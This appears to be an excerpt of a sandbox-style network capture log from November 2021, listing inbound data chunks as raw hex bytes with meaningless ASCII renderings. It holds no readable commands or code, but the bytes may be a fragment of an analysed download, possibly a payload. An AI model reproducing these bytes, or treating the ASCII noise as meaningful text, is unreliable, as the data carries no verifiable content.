                                                                                                                                                                                2021-11-11 11:26:10 UTC5584INData Raw: 60 03 64 f3 8c d0 59 e2 c7 17 70 b4 95 c0 c8 68 78 9e 64 4f 38 69 bc 4c 3c 81 d8 38 00 88 52 36 d9 d6 cf 46 9e a2 04 79 61 fd bb 2a 0c 10 6b bd a4 24 12 ea f6 35 38 38 42 08 81 61 fd ef c0 a5 0e 30 26 37 03 b4 a7 d5 dd 74 94 0b b0 cd db 75 a2 3e c1 2c 90 90 02 68 80 41 20 7c fa 28 87 3b ac 0c 03 ab e1 24 30 4f 2f a6 38 ec 7c 08 b7 02 5e 05 28 20 30 90 e3 38 47 fc 82 9d 44 38 33 e5 0e 6c 1d c9 38 fa 79 0a 18 5c 8b 30 c6 10 20 71 e1 4e 87 be d6 64 70 2f 61 9f a3 bc 3c de 0a 30 9c 59 cb f4 89 a9 8f fc 70 83 1a 2e f7 43 07 30 57 ee 11 95 50 b2 b3 21 04 4c ab a0 86 81 05 24 13 36 02 52 ec dc 83 3c 76 fb e0 a3 69 a2 41 ee 64 be bc 33 cf 59 70 27 dd a4 98 6a 41 69 82 24 09 73 8c 0d 24 da 88 2c 63 60 26 cc 6f 31 c2 c8 2d 6e 9c de 04 70 68 67 12 fa f2 60 d5 4b ef
                                                                                                                                                                                Data Ascii: `dYphxdO8iL<8R6Fya*k$588Ba0&7tu>,hA |(;$0O/8|^( 08GD83l8y\0 qNdp/a<0Yp.C0WP!L$6R<viAd3Yp'jAi$s$,c`&o1-nphg`K
                                                                                                                                                                                2021-11-11 11:26:10 UTC5600INData Raw: d4 b7 57 2d fe 2d 71 56 6b 9f b2 96 ff 7c 2d 33 82 8e 55 91 6b 99 d1 04 2f 5d 96 49 95 d7 94 83 7e 68 1d a9 fb 37 41 49 70 fd 69 4c 2e e3 09 65 52 df eb f4 61 28 ec 5f 9f f9 c8 5b de 9b ff bf ab c5 5a 82 4f bd df a1 f6 68 f8 7f fa 7d 1e df 9f 17 bf 9d c9 2c 96 b6 49 01 e9 f6 bf e0 ff 3d 25 2e cf 65 72 f5 08 98 7c fc e1 0a 74 e9 d2 3a 7d ce 9a 2f 37 3d 5c 4a e3 5b c5 a0 7c f4 0b 09 88 bc 46 6e 7f 02 5f c2 4f d0 9d 4a 3f c8 bf 49 13 16 c1 cd 9d 27 9f 04 be c9 f8 33 66 b7 0c 17 0d cc 6c 40 77 ef 60 68 a7 16 f0 df 2a 23 b3 40 60 3d 38 37 fc fe 5e 00 b2 e2 fa de 02 45 7c 6e 38 14 e6 6c c9 28 26 bf 04 f4 42 aa 98 95 ee 00 9f c4 a9 65 db 1b 13 ce 0e e7 4c 6c e4 40 eb df 09 ca 2e 50 5e 50 93 18 36 d2 39 3c 30 cf a0 8e c8 c9 16 0a 34 1b fc e3 1e e8 fe 58 80 24 66
                                                                                                                                                                                Data Ascii: W--qVk|-3Uk/]I~h7AIpiL.eRa(_[ZOh},I=%.er|t:}/7=\J[|Fn_OJ?I'3fl@w`h*#@`=87^E|n8l(&BeLl@.P^P69<04X$f
                                                                                                                                                                                2021-11-11 11:26:10 UTC5616INData Raw: 40 27 f1 7a 3f 2f ba 63 f6 b0 60 e9 9f 8c e5 04 ff 90 35 a4 55 82 e4 ee 7d 00 74 94 dd 0b c3 c1 14 18 03 c4 fa 7b c6 ec 06 90 aa 18 ea bf 1d 0e 21 40 00 79 ad 3d a7 25 96 38 0e 00 4d f3 0c 7b d3 90 43 16 95 c5 64 81 77 d5 de 0e 02 6b d8 1c 3e 1f 6b c3 c6 cd a4 ec 16 20 dc 48 7c ce 0c 1b bf c2 79 4c a5 4e 9b ea 9e 0b 10 a9 21 0b 88 b4 fc f9 ae 49 d7 f9 31 d1 b6 d6 01 82 ca fc 1f 48 78 09 f4 9f 27 f6 6e 00 e8 8f b4 4b 87 37 c2 10 8e 08 02 dd 45 de 04 a0 09 d8 a8 2a 01 40 d6 0c 3f 55 34 8b 10 31 68 f5 b8 b8 1d ae 26 2c 75 f6 16 5a b8 bc 03 e4 89 4f 94 38 37 55 18 30 4c 70 d2 be 44 c0 15 16 89 65 c2 10 97 6f fb fd 73 41 86 ee e9 48 35 98 8a 5e 72 81 16 16 b0 2a 46 04 e2 6f 70 35 88 71 68 be a1 ee 7a 31 cc e9 69 00 be 52 ea 0b 11 1f ff 23 78 40 bc 98 80 4b 05
                                                                                                                                                                                Data Ascii: @'z?/c`5U}t{!@y=%8M{Cdwk>k H|yLN!I1Hx'nK7E*@?U41h&,uZO87U0LpDeosAH5^r*Fop5qhz1iR#x@K
                                                                                                                                                                                2021-11-11 11:26:10 UTC5632INData Raw: 61 20 f7 08 04 6d 44 1c f1 e1 c1 0f 46 7c 3f f7 d0 31 68 cf e9 c6 97 ee 36 fd c2 86 0c 82 0c 5b 04 c0 66 15 2b f2 01 7a 36 10 db 4b 91 24 3a af 63 c5 e8 98 3f 09 02 18 07 bd a3 4b 34 d4 a0 a2 67 a6 27 85 f2 61 16 8f e3 2c 94 ca 45 01 23 08 b9 44 05 7e bc 3a 9b bc 13 10 d8 71 ad 2a 05 68 1a 23 b6 06 2f fb 5a 1c 2f 62 f0 98 11 90 a2 c6 0c b8 b2 68 03 34 1a af 13 46 fb c8 7d 17 24 e1 7e b9 8a b6 0c 6f f0 95 12 ea a2 db b3 1f 4a 59 ff ce db 3d 02 12 77 a0 b9 00 c1 c8 17 92 0b 6d 86 c1 fd c3 f8 3e 6f cb 74 16 86 5d f7 2a 60 04 1a 74 8f 18 a0 84 9d 03 97 48 64 95 0c 99 f3 02 84 89 4c 56 04 14 fb 21 42 68 26 8e a8 fa 1a 40 2b a6 59 93 54 01 d1 42 91 8d 7e 25 10 6a f0 7c 7b 12 60 f9 17 00 1c 36 49 b5 54 df 27 33 a3 c7 5c 30 7c e6 df b9 97 80 80 2e 3e cc 5b ec 6c
                                                                                                                                                                                Data Ascii: a mDF|?1h6[f+z6K$:c?K4g'a,E#D~:q*h#/Z/bh4F}$~oJY=wm>ot]*`tHdLV!Bh&@+YTB~%j|{`6IT'3\0|.>[l
                                                                                                                                                                                2021-11-11 11:26:10 UTC5648INData Raw: aa 8c b8 1a c5 6d 01 f7 17 b3 3f b7 31 33 ec b5 48 5f e5 f0 53 0b 14 03 ec 06 a6 74 c0 41 b4 62 c9 79 40 c2 b0 d4 e4 06 5f 53 bf 13 d1 31 48 88 ef 62 44 05 75 d5 72 2c ba 70 07 29 c3 7a 4f 31 e7 ef 44 c8 1f 27 e1 67 c5 60 08 ed 68 bb 88 75 27 58 07 b2 4b fc f8 04 94 69 48 95 36 fe 92 42 d0 42 8f d5 72 da 2f c3 0d 38 98 8d 2c 0f 2a 97 8b 25 18 19 46 ad 38 e9 4f 60 e1 bd 8d 1f 45 5e 7e b0 e3 62 be 40 02 65 2b 3c 5f c4 7e 24 7c 3f 40 23 60 09 2e 73 10 e0 90 6e 20 a0 22 26 5e 39 22 42 f8 87 81 be 34 be d4 d4 d1 e0 3b 7a 4a fb 02 14 82 cb c3 0c f9 55 38 44 69 16 25 d4 99 d4 0b e9 c6 86 08 f6 6f a5 f2 2a da 4c ac 4c 05 cb 02 96 05 17 0c bf 34 d8 ee e6 ed 1f 20 82 65 13 10 b8 f0 89 2a 19 78 b2 18 19 e5 e8 d4 0b 01 2f 95 4f fc 54 0c c6 64 de da 0a 17 ca ef fe 60
                                                                                                                                                                                Data Ascii: m?13H_StAby@_S1HbDur,p)zO1D'g`hu'XKiH6BBr/8,*%F8O`E^~b@e+<_~$|?@#`.sn "&^9"B4;zJU8Di%o*LL4 e*x/OTd`
                                                                                                                                                                                2021-11-11 11:26:10 UTC5664INData Raw: 89 99 3e f9 31 19 c8 79 d8 6f 44 b4 fa bd 52 c5 46 c2 da fe 35 60 3a ea 98 78 77 06 89 a9 68 79 f3 2c 30 72 45 24 7b 64 16 d4 3d 90 18 33 af f4 10 5c 4e 76 80 9d 6b 50 0d 63 5b 0c e4 29 5e 38 ac d5 90 83 30 0b 94 53 ff 95 63 05 f4 eb d3 16 48 14 c7 42 4a 7d 8a 35 e8 48 81 74 00 d3 83 68 2f c9 82 dc 9f 10 22 e5 b9 09 2e cd 0f a6 6a fa fd 06 cf 1d d1 56 50 66 90 8a 19 0c 7c 3d 24 bd c2 df 1d f0 8e f2 ff 13 aa 3a 37 25 64 84 40 08 ea b3 b7 c1 3b 1d a0 7e 01 e0 86 83 30 0b 0f b6 dc 1c 24 c3 da 84 56 fa c9 c7 eb 71 03 37 0c 8c 30 c2 02 24 1e 18 3b 20 3e b2 d5 d6 0c aa 28 23 92 60 dc 10 7b 52 66 13 34 f2 20 f4 11 ae 48 88 ad b9 20 7b 46 2f 8e 91 22 96 58 85 00 cb 3e 4b 1b 00 64 03 d2 ef 6e fb bf 53 25 f0 a0 fe 4f 2f 64 bb c0 0c 67 58 04 54 69 03 17 44 1b fa 50
                                                                                                                                                                                Data Ascii: >1yoDRF5`:xwhy,0rE${d=3\NvkPc[)^80ScHBJ}5Hth/".jVPf|=$:7%d@;~0$Vq70$; >(#`{Rf4 H {F/"X>KdnS%O/dgXTiDP
                                                                                                                                                                                2021-11-11 11:26:10 UTC5680INData Raw: 35 b1 53 b6 ee 96 80 45 4c b0 74 59 2f d1 16 07 36 37 f3 ed 63 06 d0 d0 c5 b7 6f 44 03 e2 96 0f 4d 48 cd 12 1c 37 1b ea 89 da 6e d1 3e b6 32 e1 5b 80 0c 54 f8 77 6b 5e 84 cf 10 64 f3 fd 22 c0 f1 3f 48 df 1e 01 ec 11 f8 03 77 a3 26 6f a8 8a 88 56 b4 0a ae 90 9f 8e f4 fd 4b 3b af 99 6d 42 c0 f6 89 0f ee 37 a2 c8 5d 56 cf a5 ff cc e2 a1 e9 d5 20 e8 e8 12 5d 41 5a ad cd 09 9d 8e 54 57 c7 cc 27 ce 8d 95 74 d2 c9 1a a3 5f fb 8f 6b ff 1c 5b 9c ec d2 55 14 be 95 47 22 cb 5f be 14 4f 50 cb ad c1 6c bc 9f 72 6b e6 7f 88 ee 5a 7b 67 80 52 53 5a 68 ad dd 25 fd 5f 5d 66 5f 78 28 97 57 be f4 97 55 1f 01 25 76 f3 e9 d5 f9 ba f9 84 60 8d 4b d4 3c 2c 25 fc 7e ed cc 14 ff 95 fd 16 f1 b2 2d bf f9 dd e0 e9 1d d9 de 00 ff 5c 0f 93 7a ea 09 df 72 3c 00 7c 5b 4d ab a3 6d 44 bf
                                                                                                                                                                                Data Ascii: 5SELtY/67coDMH7n>2[Twk^d"?Hw&oVK;mB7]V ]AZTW't_k[UG"_OPlrkZ{gRSZh%_]f_x(WU%v`K<,%~-\zr<|[MmD
                                                                                                                                                                                2021-11-11 11:26:10 UTC5696INData Raw: 75 63 10 2c e8 4b 0e 55 33 35 40 0e 7c 6b b7 dc 3f 7b d5 e0 ac 62 eb b8 28 c7 fc 22 2a d1 05 9e 37 85 1c d6 d7 fd ad de 94 10 05 e1 0c 79 4f 00 83 4b 09 93 6d a8 62 46 1c e4 07 7d 7b a4 20 90 30 d4 65 18 1c aa b8 4a ec 90 a6 e0 45 fc 0b ff 37 6e e6 59 0e 02 69 93 e3 48 77 1a 8e 06 94 44 92 e2 c8 27 5a 84 c0 e8 65 ce 4b 9f c7 ab 21 e5 7d 72 80 2c e8 c3 5d 28 5a 34 c4 10 1e d6 ab a9 d1 dc 02 bd 87 9d 7c 83 bc 5b bc e1 49 e8 34 ee 0e 4e 90 a9 26 d8 0c 1f a2 4f 8c c7 80 0f 90 58 be 78 97 78 b6 9d fd b3 93 1c 14 34 49 24 21 69 d7 59 42 0c 30 8e 68 6c 1b 7f 8f 0f 40 02 18 3b 97 ba 78 0a fc 94 04 b2 91 20 b8 67 12 08 85 a4 aa 10 c4 0a 8b 07 aa 31 6d 44 98 6f 56 7b af d5 5c 06 ac ba 7a 80 5f 05 85 72 bf 72 b5 79 0c 30 7a 61 8a 1e 9c 0d ff 5d 15 56 86 16 32 45 87
                                                                                                                                                                                Data Ascii: uc,KU35@|k?{b("*7yOKmbF}{ 0eJE7nYiHwD'ZeK!}r,](Z4|[I4N&OXxx4I$!iYB0hl@;x g1mDoV{\z_rry0za]V2E
                                                                                                                                                                                2021-11-11 11:26:10 UTC5712INData Raw: d2 b0 40 ec db 95 c0 14 e0 54 aa d3 c5 12 06 c2 59 09 e2 91 d4 26 2d a7 ea e2 bb fa 6e 00 0b ad 9c 94 a1 c2 6c b5 98 b2 0c 0d b1 88 2c 30 9e f2 aa 17 53 69 38 af ce a4 61 54 c4 67 7f 50 90 7d eb 1c 2d 52 ce 5c aa 0b f4 99 7f b8 6a 2d c2 bf e5 68 82 12 01 b8 2c 11 79 10 16 7d b2 13 29 b7 36 f0 8e 86 83 ba 3d d6 b2 09 01 56 58 da 00 6a 52 27 b9 35 3c 2b 49 c0 a0 1a 93 4a ad ae e2 dc 95 78 1c 00 72 64 3e 2d f6 07 3a e0 70 02 01 f8 4b e6 6d 70 e9 54 f2 c0 26 08 4a 7a 5d ec 0d 30 b0 8b 64 d8 c4 1e 0f 63 3b f0 3a 60 07 b9 57 2e 23 1e d4 c3 42 18 ff 3c db d5 28 0a a7 c0 28 26 63 90 00 45 6a 04 85 fc ff 44 8f 27 b9 1d d0 42 60 89 08 f6 76 09 8e 97 03 9b d5 8c 52 3e 5c 01 cf f6 f4 2c 89 ba 20 15 e9 25 bb e4 72 9c 08 a9 7a 47 4d 09 fe 9a 55 f8 03 2f d6 ec 00 a0 69
                                                                                                                                                                                Data Ascii: @TY&-nl,0Si8aTgP}-R\j-h,y})6=VXjR'5<+IJxrd>-:pKmpT&Jz]0dc;:`W.#B<((&cEjD'B`vR>\, %rzGMU/i
                                                                                                                                                                                2021-11-11 11:26:10 UTC5728INData Raw: 1e d7 44 6c 38 70 75 45 9f 84 3f 42 4e fb 32 0e e0 20 7f 05 00 5e e3 a6 31 3d c8 f7 5c e6 9b 01 86 2b eb 16 20 44 94 28 8e 25 c3 5f 96 d4 c5 08 08 7a f7 4c 5d 6a f1 9d e1 01 a6 04 6e 7f 98 10 d2 ba 0a ea a6 02 26 d8 0e c7 00 c2 ad 65 2f 2b dc b0 f8 01 26 3c b3 3f 13 68 8f c4 b5 48 20 87 c7 0b 80 0c ab 41 78 10 61 5a 14 0e 75 49 ca 87 e8 4a db 49 3a a8 2c 4e 00 22 d0 e3 1f 15 35 be f2 d9 4a 74 ee 28 e0 ea 4c 97 b1 06 b4 9a 30 98 24 00 88 0b 8d c5 6b cd 5f 17 0c 90 0f 94 73 34 07 6e 18 06 00 ed 6e c3 16 22 95 b8 60 9b 5a 30 7b fa 9c a6 a1 90 60 73 1c a8 7d 7a 6c ea 34 90 40 12 78 f1 ff fe a7 38 06 ba d6 fd 54 40 03 46 04 20 34 97 37 17 10 6a f1 bf 2d 34 48 0c d8 16 fd a4 02 20 8f 11 1f 01 b7 74 76 60 86 5b fc 54 d3 ad 94 fe a8 b8 01 e8 63 b6 31 6a 66 3a 90
                                                                                                                                                                                Data Ascii: Dl8puE?BN2 ^1=\+ D(%_zL]jn&e/+&<?hH AxaZuIJI:,N"5Jt(L0$k_s4nn"`Z0{`s}zl4@x8T@F 47j-4H tv`[Tc1jf:
                                                                                                                                                                                2021-11-11 11:26:10 UTC5744INData Raw: aa c4 1c a6 64 ea 71 42 fd 47 3b a8 c0 ca 36 08 42 e4 2d 44 78 32 7c 19 b6 70 f5 d1 38 a8 67 31 47 55 64 fa bf 00 bc 78 a3 64 7e 88 5f a0 a0 cc 99 3f 03 5b 6e ec 2b 12 c2 a7 26 82 b6 40 51 18 00 14 a0 f3 19 3a d9 3b 47 aa e3 7a d7 8b 78 22 27 69 e9 d4 cd 02 b7 e4 e3 37 74 f5 81 9d 88 c3 2a e9 c9 bb 2f ed 0c e6 14 27 92 b8 92 22 f4 36 73 e4 31 a6 6d 2e 8f f0 4e 43 2e 34 50 10 ee 10 7b 43 05 90 0d 54 e2 79 ee b3 bc 90 ac 09 13 d3 41 00 e8 f0 8f d7 7c 5f 31 f0 b0 2e 70 6f ae f8 96 6c 82 cc 17 b0 ea 03 4a 03 07 f4 50 1a 64 e8 ac 91 f2 4f eb d1 64 f5 37 3e 3b 1c 14 52 f3 1e 10 fc 3b e9 40 1c 80 02 da 50 0e ea 0b 1e ad 67 76 57 38 bb 6c 5c f3 18 cd 25 2b 50 0b 14 1d f5 5f 21 f1 54 4a 99 2a b7 32 04 e3 01 de 8c ea 9c 90 29 3e c3 e4 5e e9 08 d2 aa 30 94 df eb a6
                                                                                                                                                                                Data Ascii: dqBG;6B-Dx2|p8g1GUdxd~_?[n+&@Q:;Gzx"'i7t*/'"6s1m.NC.4P{CTyA|_1.polJPdOd7>;R;@PgvW8l\%+P_!TJ*2)>^0
                                                                                                                                                                                2021-11-11 11:26:10 UTC5756INData Raw: 13 0c 03 6f eb 6e 74 89 70 3e ac 43 25 01 7b 47 19 c4 30 4b 83 98 59 7d 27 4c 40 0c a3 9c 12 2c 32 cc 07 80 05 6d 09 7d 6e 55 0c dd d8 9b 33 b4 c8 06 93 1f 57 16 34 20 27 92 08 f6 d3 ec 34 1d 01 d2 13 ef 24 31 15 4a 72 2e 19 22 a2 38 db 80 0e e4 1a 0d 4e 8b d4 60 4d 7c cd 4f 70 7a 09 62 94 91 bd d5 51 3f 08 d2 fe 00 f2 c4 0e 73 4f 51 c1 58 37 b0 83 14 92 52 19 47 6e 39 d1 c0 5d ed fe 69 61 79 14 40 88 4b 6a b9 03 d0 bb 5d 14 05 21 cb 50 25 d2 b0 ae c4 7e 30 54 b0 dc ab 16 b5 4f 6c 75 dc 00 96 4a 9f 2e 03 a5 eb c2 55 76 6b e0 bc cf 63 e2 a0 0c 3f 09 c2 60 65 ea 80 ff 7a cb 27 a1 b7 68 7c ae 1f bd c7 fb e9 ff 65 03 0b 0d 39 dc fb 7a dd a2 08 88 91 60 fe 8b 14 2f 4a 18 21 c3 e4 98 03 8c f0 d3 a4 c1 24 00 69 f5 7f f8 81 d8 22 77 40 1c 51 14 cd b0 4b a0 10 b7
                                                                                                                                                                                Data Ascii: ontp>C%{G0KY}'L@,2m}nU3W4 '4$1Jr."8N`M|OpzbQ?sOQX7RGn9]iay@Kj]!P%~0TOluJ.Uvkc?`ez'h|e9z`/J!$i"w@QK
                                                                                                                                                                                2021-11-11 11:26:10 UTC5764INData Raw: a7 5b f8 bb 31 f4 76 78 c2 21 44 08 02 6f 82 15 48 c6 ce c9 30 67 57 ce 22 20 59 ff 21 60 9c 01 9f 11 c9 63 d4 7c e2 06 16 d5 e9 b5 44 25 b0 61 55 e4 dc cc a8 d2 29 0b 39 28 f5 b4 3b 1d f7 d0 c4 63 b8 02 70 7d fd 57 3f 1a 08 ee b6 0f a1 4a b1 f0 a2 9f b8 00 e2 4c e5 d0 41 b4 1b 4d 01 55 9c 68 a1 63 db 6c 3e eb 35 14 b8 b1 17 94 10 ec 6a 93 8e 3e ca ee 1f ad ce d8 7f 41 25 de 17 ff c5 43 0e 63 80 b3 74 e4 e1 d1 7e 38 e9 68 0e e5 17 e9 69 a1 f7 4e 7e 7b 3f f3 f2 c1 a1 8c f4 6b d4 dd 58 2d b7 7d 77 17 4d 64 5b f3 f3 e6 96 bd f1 01 58 68 25 1d 2e 6d 7f 42 30 9b f7 3f 75 dc 68 e5 58 ea b7 b7 97 b6 15 4b eb 8a 52 d7 ae 29 0d 38 7e 4f be 2e a0 4b ba dd a7 a7 89 54 78 e9 87 f5 bf 14 d7 eb f9 88 e4 20 49 e9 12 8d 98 b9 03 ba 27 c6 6f b9 22 09 1a aa 93 68 fd 02 35
                                                                                                                                                                                Data Ascii: [1vx!DoH0gW" Y!`c|D%aU)9(;cp}W?JLAMUhcl>5j>A%Cct~8hiN~{?kX-}wMd[Xh%.mB0?uhXKR)8~O.KTx I'o"h5
                                                                                                                                                                                2021-11-11 11:26:10 UTC5776INData Raw: cf 06 f3 91 78 b2 07 20 ec 93 ff 3e 0b 76 90 7d c8 06 0b 63 27 7d 12 d4 b4 e3 0a e5 01 8c cb e7 43 04 b8 90 40 86 0d 02 46 65 a3 49 03 0d ae 6c 34 2b e1 73 69 e0 06 db 9d 6d b7 44 04 f7 c7 74 b2 85 c8 21 95 09 05 37 c1 84 81 9d e4 5f 8a 92 3e 6f f8 04 cb 05 78 bd 4a ee ac 28 e1 41 14 32 44 21 20 b0 66 90 53 01 60 0d 0c ec 10 97 7d 31 84 c0 10 6a 6b fa ff e5 c7 03 21 1b 9f 48 03 6c 87 6a 4d 25 d2 fe d4 53 5c 1a 60 24 27 66 a8 b6 00 6f f4 d6 ae 63 3c 02 81 63 a3 89 e1 3e 2d c0 c0 73 18 02 f2 0b 8f b7 60 26 36 bf c1 58 0e 75 10 f6 80 3c 50 3c f4 c3 20 9b 00 1c db 13 c6 eb 70 f9 3b c0 2c 88 85 e5 75 8c 07 a8 7f 16 6c f0 9f eb 06 7c 7a 27 e6 08 25 24 5f 71 ea 8e d0 c4 f3 6c 48 5e 4f c1 ae ca fa 84 eb e4 29 83 e0 1f 9a 88 5f 12 e8 8c c2 91 14 d1 a6 62 9c 39 0b
                                                                                                                                                                                Data Ascii: x >v}c'}C@FeIl4+simDt!7_>oxJ(A2D! fS`}1jk!HljM%S\`$'foc<c>-s`&6Xu<P< p;,ul|z'%$_qlH^O)_b9
                                                                                                                                                                                2021-11-11 11:26:10 UTC5792INData Raw: fe 5a 4a 20 8c 98 3a 51 fc a1 02 0e 64 31 12 eb 64 29 4c 9e be 70 68 27 e1 1f 90 5a 2e eb 20 e6 02 21 2f 25 08 2a 67 40 65 1e c8 70 80 a2 6c 99 dc 0c a8 2f 5c 22 12 99 85 9e ba 30 54 65 ec 16 41 f0 20 a8 94 67 43 5c 8c 04 56 b0 ae 53 25 54 5b 7f 16 66 30 e9 a1 0b 68 3b ed 25 7f 52 5c f5 c0 63 1a fd 3f 49 5a a6 5a b0 bf 3a 27 83 f7 76 59 3a 09 d9 f3 b3 a3 83 ef 04 d9 ff c7 b9 1c 84 54 d3 78 3b 83 ab fc ea 5f 04 e2 aa a6 c5 5f ba 49 45 57 d5 d9 dc 5a 7f b0 29 9d a1 27 ef 7d 7f ca 76 01 09 44 01 eb ec 5d 53 1d 68 5c 76 e7 51 07 07 bf 11 1f 91 12 f7 d7 32 f3 04 e3 c3 5d 76 c6 b0 16 4f 5a f8 4b c0 81 f3 0b 1d b7 27 76 e9 fe 47 39 4e ff 75 75 ea 28 ba 3f 8a 78 e6 7f af 06 7c 7e c1 eb 03 56 98 94 0a fd 65 f7 db d4 06 0d 8c b5 22 40 e3 c3 0c 27 80 2d c5 2e ca 09
                                                                                                                                                                                Data Ascii: ZJ :Qd1d)Lph'Z. !/%*g@epl/\"0TeA gC\VS%T[f0h;%R\c?IZZ:'vY:Tx;__IEWZ)'}vD]Sh\vQ2]vOZK'vG9Nuu(?x|~Ve"@'-.
                                                                                                                                                                                2021-11-11 11:26:10 UTC5808INData Raw: dc 0e 8c 32 e9 98 fc e3 40 47 33 57 ca 26 9e 2f d7 36 6a 31 0e d6 2c f0 9e af 4c 7f b2 3e 5f ba 12 34 4c 31 85 b8 18 a4 8d 42 26 40 dd d9 ee e0 54 36 bc 3d 80 c2 f8 97 54 e8 0a 1d ac 1c 00 7b 2d 6c 29 d9 e1 58 c1 43 0c ea bd 4b 34 b9 1c 2a ae 49 1d 66 00 10 bb c4 32 2e 45 1d fc 70 78 52 8e 26 36 8c 0b d8 33 ec c1 10 a4 63 64 04 a2 b6 7f 20 4d 98 cd 75 6f 41 da 76 00 a8 70 42 a6 8b e4 25 a0 15 5a 94 18 11 bf 7f c8 0b 5f 26 a6 7d 5c 50 6c c1 b1 98 03 cc 9a e2 27 13 24 ba 10 22 5c 6d 75 80 18 81 57 d0 e8 3c 0b 2c 01 32 cd 16 c0 9a 91 c2 7c d6 5b 12 d4 80 f7 eb 99 c0 64 88 56 2b 52 4d 48 04 2f 79 a3 41 32 68 85 0b 01 01 c4 72 9a 16 d9 59 20 46 e5 bb 21 40 44 cf 58 1a 58 84 32 69 ea 20 88 7c 29 75 c5 24 d7 8a c8 2c bc 50 6f ba 6d 01 b2 e6 db 7f 83 12 87 e4 a5
                                                                                                                                                                                Data Ascii: 2@G3W&/6j1,L>_4L1B&@T6=T{-l)XCK4*If2.EpxR&63cd MuoAvpB%Z_&}\Pl'$"\muW<,2|[dV+RMH/yA2hrY F!@DXX2i |)u$,Pom
                                                                                                                                                                                2021-11-11 11:26:10 UTC5824INData Raw: 94 16 bd 30 64 ff 5d cb dd 1e 67 32 93 a6 be c8 81 54 dd af 5f 3f 34 0a 80 fb de 3e 93 5a 11 80 43 cc 60 7a 24 71 b8 0f 0b 49 75 5f 6e d1 e0 81 16 f7 2d 4a 00 23 2b c3 94 08 0b 58 ec 33 16 62 52 a9 fd d8 0c 7f 18 5e b9 e2 d7 87 7c 40 1c 31 e9 18 bb 75 0c 24 b8 3d 96 45 8c 42 43 ac 6e 00 70 05 19 8f fb f7 8d e9 13 16 7d f9 be 73 81 96 e0 4a b5 fd b7 4c d3 b5 7b 37 e2 0f ba 82 84 47 1a d7 16 b7 43 40 72 e1 da df 4d 9f 0c ee b1 10 b5 4b cd ee 34 db 70 26 c5 26 56 12 2d e9 49 88 28 2c 04 24 2a 10 fe 5c af da 04 94 22 00 e1 7c 97 0e ff c6 81 79 f6 02 89 fc 5e c1 e6 06 c0 d3 f1 18 3c 2b 5f f6 79 03 02 c6 69 c8 83 45 01 f6 28 79 6c 08 82 12 0a 07 7f 30 79 50 53 bb 02 c5 e7 76 57 f7 db 42 4a 80 49 ee b7 72 cf 98 07 27 d8 5b 75 1a 14 56 b9 40 28 d0 fb 77 97 19 7a
                                                                                                                                                                                Data Ascii: 0d]g2T_?4>ZC`z$qIu_n-J#+X3bR^|@1u$=EBCnp}sJL{7GC@rMK4p&&V-I(,$*\"|y^<+_yiE(yl0yPSvWBJIr'[uV@(wz
                                                                                                                                                                                2021-11-11 11:26:10 UTC5840INData Raw: 8a 1a 55 48 b5 0d 0f 00 d5 59 3a b0 06 41 ca 4b 3b 42 48 8b 18 14 ac d5 18 12 37 90 b7 5c 2c 45 30 ac 24 6b ac 59 42 62 98 11 f6 08 2d fe 36 d3 13 28 a8 b8 f7 8a 27 9c 7e 66 72 75 dc c8 13 50 fe 9b 45 20 87 4a 5c a8 ed c7 95 03 08 72 7d 80 fe c5 e8 bf 3c bd 29 41 d5 51 e2 cc 7a e8 d3 3e fc e6 52 17 09 11 23 56 80 0e fc 51 f7 5c 9f 54 2b 54 24 41 54 e8 2d de f6 ce 94 37 5b ac 0e 12 b4 7d ff 3a fb 26 53 2d 5d 2d 7f 39 c3 50 6a c3 8d c2 5b 8c 53 5b bf 8f 8f 41 91 22 21 4e bf 2d 49 0a 61 4e ae ce 3a 97 bf db e4 4e bb 8f 58 4a a8 3c ac 68 09 6a 23 df 50 81 e4 d6 fb 3f 32 f4 9d d7 c0 e4 0e f9 5e db be 68 51 ff 25 8e db 8f 42 62 c9 f3 50 41 7c c8 20 d7 16 30 97 39 1c 69 e1 fe 95 d4 a6 e0 51 da a2 14 80 40 3e 0d 9b 18 cd 34 10 f4 ca fe 9b 0a 9c 96 7c 54 49 0c 01
                                                                                                                                                                                Data Ascii: UHY:AK;BH7\,E0$kYBb-6('~fruPE J\r}<)AQz>R#VQ\T+T$AT-7[}:&S-]-9Pj[S[A"!N-IaN:NXJ<hj#P?2^hQ%BbPA| 09iQ@>4|TI
                                                                                                                                                                                2021-11-11 11:26:10 UTC5856INData Raw: 01 53 95 01 1c c3 2f 37 fd 2d d3 80 78 d7 d8 2e 80 01 72 97 44 aa 98 d0 05 82 1c 4a 9b 95 11 e5 c9 0a 84 c4 2c 0b 1f 97 d4 3a 85 aa 37 01 44 8c e3 c4 81 06 84 fb ba 28 28 cf 9a 00 f2 ad bb 67 5c be 2c 14 31 8a db 20 22 53 8f 3c c1 23 e0 3d 2e bb 02 28 9c 0f 82 77 dc eb d9 04 e7 be 03 ad fb de d1 e6 14 24 3e 72 c0 44 03 80 a8 a7 7e 64 03 c7 c6 12 58 07 cf 03 20 fb d9 fc ff 52 80 cb 36 af 00 c6 2a 03 5d 4b b4 58 38 99 1d 83 09 e7 fd da 18 14 9a 5b 40 44 35 c0 a8 a7 91 f8 12 bb 00 2c ad 06 77 89 97 0e d0 ea 42 a0 b5 85 58 51 61 26 6c ae 03 9c 7f ef cd f6 76 c0 06 ed 54 50 57 7e 5c 3e 64 a9 28 60 a6 11 a3 8e 02 17 2f 34 ee 89 55 41 6e 2c b9 80 20 e5 53 9f 17 c6 05 99 4e 03 9c 2b a3 40 1c 48 10 c7 22 25 43 53 20 a5 d3 5f a6 1e 81 0a 53 12 75 be 6c 27 02 92 f8
                                                                                                                                                                                Data Ascii: S/7-x.rDJ,:7D((g\,1 "S<#=.(w$>rD~dX R6*]KX8[@D5,wBXQa&lvTPW~\>d(`/4UAn, SN+@H"%CS _Sul'
